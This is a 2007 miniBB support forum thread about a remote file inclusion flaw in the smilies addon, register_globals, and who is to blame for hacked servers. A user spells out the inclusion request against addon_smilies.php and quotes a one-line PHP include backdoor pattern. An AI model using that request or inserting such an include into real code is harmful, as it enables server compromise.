miniBB ® 

miniBB

®
Support Forums
  
 | Start | Register | Search | Statistics | File Bank | Manual |
The Other miniBB Support Forums / The Other /  
 

Vulnerable code... often upgrades... and other things you must know before installing open source

 
Author juju
Partaker
#1 | Posted: 28 Jun 2007 04:40 
wow.. nice code..

if(!isset($pathToFiles)) include('./setup_options.php');

include($pathToFiles.'img/'.$GLOBALS['dirname'].'/smdesc.php');

so all u have to do is to do a request to addon_smilies.php?pathToFiles=someurl
and make an img dirname and a file smdesc.php and we are in biz..

Hope there is not so much code like this

Author Paul
Lead Developer 
#2 | Posted: 28 Jun 2007 08:39 
juju

Study miniBB code more carefully and you will understand that you are wrong.

These lines actually mean HOW we have fixed the recent vulnerability discovered.

If you put a request like addon_smilies.php?pathToFiles=someurl all you will get is a "Fatal error."

http://minibb.org/addon_smilies.php?pathToFiles=something

Thus it worked previously ONLY if register_globals setting of PHP is set to ON. It's a known fact that even PHP developers recommend turn this setting OFF as it comes by default. So you are in 'biz' only if some clever admins insecured their hosting server.

Hope there is not so much code like this

We hope everything like this is fixed in default miniBB long time ago...

Author juju
Partaker
#3 | Posted: 28 Jun 2007 23:28 
I'm in zis 'biz' since 1999 so turning off globals is a feature I can't afford. Lot of clients have old software not compatible with this.

Author Paul
Lead Developer 
#4 | Posted: 29 Jun 2007 02:58 
Lot of clients have old software not compatible with this

- that only means this software is written in unprofessional manner. Who cares? Continue to use old and buggy software 'cause the budget doesn't allow to fix it, and the bugfixes based on this setting will never end...

Author juju
Partaker
#5 | Posted: 4 Jul 2007 04:14 
Unfortunately using your software was a budget decision and only because of this board got my server hacked 4 times since 2004. Now I can afford a migration to a paid board, however I do not have an import script so i'm stuck..

Author Paul
Lead Developer 
#6 | Posted: 4 Jul 2007 04:24 
and only because of this board got my server hacked 4 times since 2004

- not only because of this software, but because of the insecure server settings on your side I must say.

Installing open source programs you are always under risk. I am wondering how many times would you been hacked since 2004 if you installed vBulletin (paid) or phpBB (free) board which have had tens if not hundreds of holes by this time.

In general, all patches and security fixes are released immediately by our team since they are discovered. If you do not follow our news and do not update your software in time - who cares? It is your fault. What we have on minibbtest is the version with even admin access, despite of that it has been still never hacked not just because the newest release is always installed there, but also the server has normal security settings which make a lot of sense.

Now, instead of making a business offer and ordering a convertion script which would cost you not more than $100 I suppose, you are whining and screaming, as usually unpotentially unsatisfied free software user which wants everything for a zero cost, and it seems your huge experience since 1999 didn't improve the quality of your business at all.

Arghh... postings like yours always make me mad. Sorry it was emotional. The choice is in your hands. Do not claim us if you are not sure in yourself.

Author juju
Partaker
#7 | Posted: 4 Jul 2007 04:40 
Installing open source programs you are always under risk. I am wondering how many times would you been hacked since 2004 if you installed vBulletin (paid) or phpBB (free) board which have had tens if not hundreds of holes by this time.


This is true. Thats why I tryed your software. However I moved your software and all other potentially insecure software on a separate server. I do have backups and if someone will hack it I can put everything back. Some servers have selinux on and globals off other doesn't. That it depend on when that server has been setup. Some persons are running hundreeds of sites and they don't care to update them. Making a new software version incompatible with an old one reminds me of microsoft and this is what php did.
Unfortunately my site use to be a PR5 or 6 and that made it vulnerable to any new attack. Removing the version from the credits was a huge security gain.. however indirect.
Having a line this :
if(isset($somevar)) include($somevar); remind me of some scripts which add this as a backdoor and works well with globals off if you change it to
if(isset($_GET['somevar'])) include($_GET['somevar']);. Sometime I wonder if wasn't this intention cause is way too simple. So this is the reason I posted.. because of the way too simple way of access not of the hole itself.

Author Paul
Lead Developer 
#8 | Posted: 4 Jul 2007 04:51 
Sorry I understood only the first paragraph and can't get the idea how the "code lines" could be related to miniBB. In our software, we have no backdoors, no hidden spies etc. I could give the personal warranty that this software is doing just what it has been designed for.

Security issues we are having from time to time are MOSTLY related to register_globals setting and improper input validation. We all are humans and part of the script was written in the era when we have just started to develop miniBB (for example a long-living Smilies addon which has been fixed recently, has a code programmed in 2002). We are not doing "the holes" by purpose.

I also can't understand how PHP version or PageRank could be involved in the security issues. Great you have removed the version of the software (which has been also done by us some time ago), however PHP always had a register_globals setting and it is possible to turn it off for any version. If you are using Linux servers with Apache, I am wondering why not simply to set register_globals=OFF using .htaccess for a separate folder where just your forums with miniBB are stored in (leaving other older scripts vulnerable).

The solution to secure the software using existing tools is simple... even simplier than making claims ;-)

Author tom322
Active Member
#9 | Posted: 4 Jul 2007 11:57 
Unfortunately using your software was a budget decision and only because of this board got my server hacked 4 times since 2004.
I would first complain to the hosting company (actually first to yourself if you don't have the latest version installed).

I host a dozen or so websites with 10+ different hosts. One day I got my site hacked (the site was not related to MiniBB software at all - it was a simple html site). Actually, it wasn't hacked to do a direct harm to the site - the hacker just SOMEHOW managed to upload a folder containing his whole site on my site! In public_html there was his folder: american-banking/ (it was used as a separate phishing site). Anyway, the host hasn't even realized that - when I emailed them, they said not to worry and only advised to change my cpanel password.

So in many cases it is the hosting company's fault and unless you find out the security holes yourself, don't count on them.

The Other miniBB Support Forums / The Other /
 Vulnerable code... often upgrades... and other things you must know before installing open source
 Share Topic's Link

Your Reply Click this icon to move up to the quoted message


  ?
Post as a Guest, leaving the Password field blank. You could also enter a Guest name, if it's not taken by a member yet. Sign-in and post at once, or just sign-in, bypassing the message's text.


Before posting, make sure your message is compliant with forum rules; otherwise it could be locked or removed with no explanation.

 

 
miniBB Support Forums Powered by Forum Software miniBB ® Home  Features  Requirements  Demo  Download  Showcase  Gallery of Arts
Compiler  Premium Extensions  Premium Support  License  Contact Us
Get the Captcha add-on: protect your miniBB-forums from the automated spam and flood.


  ⇑